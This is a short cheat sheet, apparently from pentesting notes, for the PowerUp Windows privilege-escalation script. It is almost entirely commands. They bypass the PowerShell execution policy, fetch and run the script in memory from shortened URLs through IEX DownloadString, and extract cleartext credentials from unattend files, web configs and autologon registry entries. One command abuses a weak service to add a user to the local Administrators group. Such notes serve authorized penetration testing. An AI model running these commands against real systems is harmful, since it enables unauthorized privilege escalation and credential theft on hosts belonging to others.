Powerup

Initial Execution

# Load from disk
Powershell.exe -nop -exec bypass
. .\powerup.ps1

# Load from Github
Powershell IEX (New-Object Net.WebClient).DownloadString("http://bit.ly/1PdjSHk")

# Invoke-AllChecks
Invoke-AllChecks | Out-File -Encoding ASCII checks.txt

# Invoke-AllChecks and load script in one command
powershell.exe -exec bypass -Command โ€œ& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}

# Invoke-AllChecks without touching disk
 powershell -nop -exec bypass -c โ€œIEX (New-Object Net.WebClient).DownloadString(โ€˜http://bit.ly/1mK64oHโ€™); Invoke-AllChecksโ€

Commands

Miscellaneous

# Check for credentials in unattend.xml files
Get-UnattendedInstallFile

# Get cleartext credentials and encrypted strings from web config files
Get-Webconfig

# Get current user tokens and privileges
Get-ProcessTokenPrivilege

Services

# Get services with unquoted paths and spaces
Get-ServiceUnquoted -Verbose

# Get services where current user can write to binary path
Get-ModifiableServiceFile -Verbose

#Get the services whose configuration the current user can modify
Get-ModifiableService -Verbose

# Exploit vulnerable service 
Invoke-ServiceAbuse -Name "Vuln-Service" -Command "net localgroup Administrators security.local\moe /add"

Registry

# Checks if MSI files are always installed in context of SYSTEM
Get-RegistryAlwaysInstallElevated

# Checks if any autologon credentials exists in registry locations
Get-RegistryAutologon

# Gets autoruns where the current user can modify the script or binary
Get-ModifiableRegistryAutoRun

References

Last updated